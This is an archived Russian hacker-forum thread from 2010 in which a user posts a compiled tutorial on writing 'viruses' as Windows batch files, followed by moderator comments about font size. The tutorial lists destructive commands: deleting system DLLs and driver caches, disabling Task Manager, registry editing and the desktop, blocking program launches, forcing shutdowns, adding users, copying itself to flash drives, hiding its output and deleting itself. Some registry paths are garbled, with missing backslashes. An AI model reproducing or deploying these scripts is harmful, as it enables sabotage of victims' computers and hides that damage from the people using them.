1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

Написание вирусов с расширением *.bat.

Тема в разделе "Разное", создана пользователем VolkKz, 6 дек 2010.

  1. VolkKz

    VolkKz Новичок

    Регистрация:
    28 ноя 2010
    Сообщения:
    37
    Симпатии:
    8
    Баллы:
    0
    Написание вирусов с расширением *.bat.
    Вы наверняка слышали о сценариях Windows, файлах с расширением *.bat. Если разобраться, то они являются текстовым файлом, содержащим определенные инструкции, которые будут выполнены после запуска. Итак, для написания самых простых вирусов (или просто сценариев) нам понадобится блокнот.
    Пишем в блокноте:
    time 00:00
    copy %0 F:\Work.bat
    Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск Ф - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число.
    Команда time просто устанавливает любое время на часах ПК.
    Команда del направлена на удаление определённого файла, после неё в кавычках пишется полный путь к файлу, если вы хотите удалить из папки все файлы с расширением txt, например, то после название целевой папки и дроби нужно написать *.txt. Если нужно удалить что-нибудь из директории Windows, гораздо проще будет написать %SystemRoot%, вместо полного пути к директории, а уже затем вводить остальной путь. Параметр /q задаёт удаление без подтверждения.
    Комадна label переименовывает указаный диск, для этого напишите буквенный идентификатор диска, знак =, и новое название.
    Команда msg * выводит на экран окно с сообщением и кнопкой ОК, после неё надо написать текст сообщения в кавычках через пробел после команды.
    Команда attrib +h +s ставит атрибут скрытный и системный.
    Команда reg add может редактировать содержимое реестра. Для этого после этой команды нужно написать полный путь к необходимому вам ключу(без кавычек), и его новое значение.
    Команда shutdown выполняет выключение или перезагрузку ПК, если после команды стоит r -t 1 -c "lol", то произойдёт перезагрузка, а если -s -t 1 -c "lol", то выключение. Также можно добавить в конце –f через пробел, тогда операция (выключение или перезагрузка) произойдёт форсированно, т.е. без предупреждения пользователя.
    Также существует команда net share, которая расшаривает (открывает общий доступ из сети) определённый диска на компьютере. После нее нужно написать в кавычках название расшаренного ресурса (на ваше усмотрение) после этого знак = и буквенный идентификатор диска в кавычках с двоеточием и дробью.
    Команда taskkill /f /im убивает указанный процесс, а указать его надо через пробел с расширением.
    Команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку.


    Небольшой перечень “хороших” и “нехороших” сценариев:
    1. copy %0 a:\b - копирует выполняемый файл на диск a в папку b (например copy %0 C:\ program.bat);
    2. date x.y.z - меняет дату на x день, y месяц, z год (например date 16.11.05);
    3. time х:у - меняет время на х часов и у минут (например time 14:27);
    4. label x:y - переименовывает диск x на имя y (например label C:Disc error);
    5. del *.* /q - удалит все файлы в папке, где лежит наш сценарий (папки остаются);
    6. del x:\y *.* /q - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q);
    7. assoc .х=.у - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.txt);
    8. md х - создаст папку, в том месте, где находится наш вирус, с именем х (пример md Papka);
    9. net user "х" /add - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);
    10. +r Установка атрибута «Только чтение»;
    11. -r - снятие атрибута «Только чтение»;
    12. +a - установка атрибута «Архивный»;
    13. -a - снятие атрибута «Архивный»;
    14.+s - установка атрибута «Системный»;
    15. -s - снятие атрибута «Системный»;
    16. -h - снятие атрибута «Скрытый»;
    17. +h - установка атрибута «Скрытый»;
    18. attrib +h +s C:/WINDOWS - скрывается папка WINDOWS;
    19. attrib +h +s C:/WINDOWS/*.* - скрываются файлы в папке WINDOWS;
    20. del %0 – самоликвидация вируса (пишется в самом конце вируса);
    21. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul – запретить комбинацию клавиш Ctrl-Alt-Del;
    22. del "%SystemRoot%system32*.dll" /q >nul – удалить все системные DLL(Динамические загружаемые библиотеки);
    23. del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul – удалить все драйверы, установленные на компьютере;
    24. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – поменять местами значения кнопок мыши;
    25. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – делает невозможным запуск приложений;
    26. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – запретить редактирование реестра вручную;
    27. del "%SystemRoot%Cursors*.*" >nul – удалить курсор мыши;
    28. del "%SystemRoot%Media" /q >nul – удалить системные звуки Windows;
    29. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – запретить вызов панели управления;
    30. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – убрать рабочий стол;
    31. shutdown -r -t 1 -c "lol" -f >nul – форсираванная перезагрузка ПК;
    32. shutdown -s -t 1 -c "lol" -f >nul – форсированное выключение ПК;
    33. taskkill /f /im explorer.exe >nul – убить процесс Explorer.exe;
    34. msg * "Текст сообщения" >nul – показать Windows-стилизованное сообщение с кнопкой ОК;
    35. del "%0" >nul – самоликвидация вируса.
    Автор: неизвестно(собрал с нескольких сайтов)
     
    Последнее редактирование: 7 дек 2010
    1 человеку нравится это.
  2. ~|~евто|-|

    ~|~евто|-| Silentium ..::V.I.P::..

    Регистрация:
    26 май 2007
    Сообщения:
    30
    Симпатии:
    377
    Баллы:
    0
    Цветные, объединяйте с _http://www.xaker.name/forvb/showthread.php?t=13292 :)
    У мя снова прав не хватает :cool_guy:
     
  3. onthar

    onthar Команда форума Админ

    Регистрация:
    8 янв 2008
    Сообщения:
    0
    Симпатии:
    609
    Баллы:
    0
    VolkKz, а можно нормальнйы шрифт?
     
  4. onthar

    onthar Команда форума Админ

    Регистрация:
    8 янв 2008
    Сообщения:
    0
    Симпатии:
    609
    Баллы:
    0
    ~|~евто|-|,
    щас исправит - объединю
     
  5. VolkKz

    VolkKz Новичок

    Регистрация:
    28 ноя 2010
    Сообщения:
    37
    Симпатии:
    8
    Баллы:
    0
    Вроде сдлелал нормальный!!!!
     
  6. onthar

    onthar Команда форума Админ

    Регистрация:
    8 янв 2008
    Сообщения:
    0
    Симпатии:
    609
    Баллы:
    0
    VolkKz,
    4 размер, это нормальный?
     
  7. VolkKz

    VolkKz Новичок

    Регистрация:
    28 ноя 2010
    Сообщения:
    37
    Симпатии:
    8
    Баллы:
    0
    Извените, а каким должен быть размер шрифта????
     
  8. onthar

    onthar Команда форума Админ

    Регистрация:
    8 янв 2008
    Сообщения:
    0
    Симпатии:
    609
    Баллы:
    0
    по умолчанию - 2.
    Лучше просто не использовать тэг размера шрифта и все.
     
  9. VolkKz

    VolkKz Новичок

    Регистрация:
    28 ноя 2010
    Сообщения:
    37
    Симпатии:
    8
    Баллы:
    0
    Ясно!!!!
     

Поделиться этой страницей